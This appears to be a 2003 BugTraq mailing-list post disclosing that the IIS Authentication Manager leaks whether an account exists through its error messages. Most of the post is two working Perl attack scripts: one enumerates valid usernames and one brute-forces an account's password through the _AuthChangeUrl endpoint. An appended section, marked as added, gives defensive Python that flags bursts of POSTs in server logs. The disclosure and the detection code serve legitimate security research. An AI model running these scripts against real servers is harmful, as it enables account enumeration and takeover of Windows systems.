BugTraq
Microsoft IIS Authentication Manager Account Conformation Vuln? May 03 2003 07:58AM
JeiAr (jeiar kmfms com)


Let me start off by saying that I'm not sure if this already exists,
but I have never heard of it and neither has anyone I asked. So I'm
SURE you all know about the IIS Authentication Manager Vuln
(aexp4b.htr) and it can let people possibly bruteforce and change
local account info on a Windows box. Well, while messing with an IIS
machine this weekend I noticed that it also gives error messages that
basically let you verify whether or not a user account exists. For
example, if a user doesn't exist it says "The user name could not
be found." and if the user does exist it will say "The specified
network password is not correct". Anyway, I don't know if I'm the first
person to notice this, but I have never heard of it. Also attached are
two quick and dirty Perl scripts I threw together to automate both the
process of identifying an account and then bruteforcing it. Anyway,
anyone ever notice or hear of the confirming if an account exists thing?

###########################################################################################
# Microsoft IIS Authentication Manager BruteForce Tool - By JeiAr http://www.gulftech.org
###########################################################################################
# This tool can be used to brute force user accounts via dictionary attack on the Microsoft
# IIS Authentication Manager. More details here http://www.securityfocus.com/archive/1/8515
###########################################################################################

use LWP::UserAgent;

###########################################################################################
# Time to create the new LWP User Agent, Clear the screen, And print out the script's header
###########################################################################################

$ua = new LWP::UserAgent;
$ua->agent("AgentName/0.1 " . $ua->agent);
system('cls');
&header;

###########################################################################################
# Gather all user inputted data. Such as the domain name, host and location of the wordlist
###########################################################################################

print "Host: ";
$host=<STDIN>;
chomp $host;

print "Domain: ";
$domain=<STDIN>;
chomp $domain;

print "Account: ";
$account=<STDIN>;
chomp $account;

print "Word List: ";
$list=<STDIN>;
chomp $list;

###########################################################################################
# Opens the wordlist and puts the data into an array. afterward setting the count variables
###########################################################################################

open (DATAFILE, "$list");
@datafile = <DATAFILE>;
chomp(@datafile);
$length = @datafile;
$count = 0;
$found = 0;

&space;
print "Cracked Accounts\n";
print "----------------\n";

###########################################################################################
# Creates the HTTP request, Checks the responses, then prints out the username if it exists
###########################################################################################

while ($count < $length) {
    $password = (@datafile[$count]);
    my $req = new HTTP::Request POST => "http://$host/_AuthChangeUrl?";
    $req->content_type('application/x-www-form-urlencoded');
    $req->content("domain=$domain&acct=$account&old=$password&new=$password&new2=$password");
    my $res = $ua->request($req);
    $pattern = "Password successfully changed";
    $_ = $res->content;
    if (/$pattern/) {
        print "$account : $password\n";
        last if (/$pattern/);
    }
    $count++;
}

###########################################################################################
# That's all folks. Prints out the final details and footer. Rest is just the subroutines :)
###########################################################################################

&space;
&footer;

sub header {
    print "IIS Auth Manager Brute Forcing Tool By JeiAr [http://www.gulftech.org] \n";
    print "---------------------------------------------------------------------- \n";
}

sub footer {
    print "Session Results:\n";
    print "--------------------\n";
    print "Number Of Words : $length \n";
    print "Number Of Tries : $count \n";
}

sub space {
    print "\n" x2;
}

###########################################################################################
# Microsoft IIS Authentication Manager Discovery Tool - By JeiAr [http://www.gulftech.org]
###########################################################################################
# This tool is used to find existing user accounts via a dictionary attack on the Microsoft
# IIS Authentication Manager. More details here http://www.securityfocus.com/archive/1/8515
###########################################################################################

use LWP::UserAgent;

###########################################################################################
# Time to create the new LWP User Agent, Clear the screen, And print out the script's header
###########################################################################################

$ua = new LWP::UserAgent;
$ua->agent("AgentName/0.1 " . $ua->agent);
system('cls');
&header;

###########################################################################################
# Gather all user inputted data. Such as the domain name, host and location of the wordlist
###########################################################################################

print "Host: ";
$host=<STDIN>;
chomp $host;

print "Domain: ";
$domain=<STDIN>;
chomp $domain;

print "Account List: ";
$list=<STDIN>;
chomp $list;

###########################################################################################
# Opens the wordlist and puts the data into an array. afterward setting the count variables
###########################################################################################

open (DATAFILE, "$list");
@datafile = <DATAFILE>;
chomp(@datafile);
$length = @datafile;
$count = 0;
$found = 0;

&space;
print "Verified Accounts\n";
print "-----------------\n";

###########################################################################################
# Creates the HTTP request, Checks the responses, then prints out the username if it exists
###########################################################################################

while ($count < $length) {
    $account = (@datafile[$count]);
    my $req = new HTTP::Request POST => "http://$host/_AuthChangeUrl?";
    $req->content_type('application/x-www-form-urlencoded');
    $req->content("domain=$domain&acct=$account&old=&new=&new2=");
    my $res = $ua->request($req);
    $pattern = "network password is not correct";
    $_ = $res->content;
    if (/$pattern/) {
        print "$account\n";
        $found++;
    }
    $count++;
}

###########################################################################################
# That's all folks. Prints out the final details and footer. Rest is just the subroutines :)
###########################################################################################

&space;
&footer;

sub header {
    print "IIS Auth Manager User Discovery Tool By JeiAr [http://www.gulftech.org]\n";
    print "-----------------------------------------------------------------------\n";
}

sub footer {
    print "Enumeration Results:\n";
    print "--------------------\n";
    print "Number Of Tries : $length \n";
    print "Confirmed Users : $found \n";
}

sub space {
    print "\n" x2;
}

I hope the formatting of this message doesn't get trashed :o)
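
For defenders: the differing error text is in the response body, which the web server log does not record, so the account checking and password guessing described in the post are visible mainly as bursts of POSTs to /_AuthChangeUrl from one client. The Python below is an added example, not part of the original post; the W3C extended field set, the sample log lines, the threshold and the window are assumptions constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

TARGET = "/_authchangeurl"  # endpoint named in the post, lower-cased for comparison

# Constructed sample in W3C extended log format (not real traffic).
SAMPLE_LOG = "\n".join(
    ["#Fields: date time c-ip cs-method cs-uri-stem sc-status"]
    + [f"2003-05-03 08:00:{s:02d} 192.0.2.10 POST /_AuthChangeUrl 200"
       for s in range(0, 12, 2)]
    + ["2003-05-03 08:01:00 198.51.100.7 GET /default.htm 200",
       "2003-05-03 08:02:00 198.51.100.7 POST /_AuthChangeUrl 200",
       "2003-05-03 08:09:00 198.51.100.7 POST /_AuthChangeUrl 200"]
)

def parse_w3c(text):
    """Yield one dict per request, taking column names from the #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):  # skip truncated or malformed rows
                yield dict(zip(fields, values))

def flag_sources(text, threshold=5, window=timedelta(seconds=60)):
    """Return {client_ip: peak POST count to TARGET inside any window} at or over threshold."""
    times = defaultdict(list)
    for rec in parse_w3c(text):
        if rec.get("cs-method") == "POST" and rec.get("cs-uri-stem", "").lower() == TARGET:
            stamp = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
            times[rec["c-ip"]].append(stamp)
    flagged = {}
    for ip, stamps in times.items():
        stamps.sort()
        start = best = 0
        for end, stamp in enumerate(stamps):
            while stamp - stamps[start] > window:  # slide the window's left edge forward
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged

if __name__ == "__main__":
    for ip, peak in flag_sources(SAMPLE_LOG).items():
        print(f"{ip}: {peak} POSTs to {TARGET} within 60s")
```

A single legitimate password change produces one or two POSTs, so the threshold separates it from a dictionary run; tune both values to the site's own traffic.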

Copyright 2010, SecurityFocus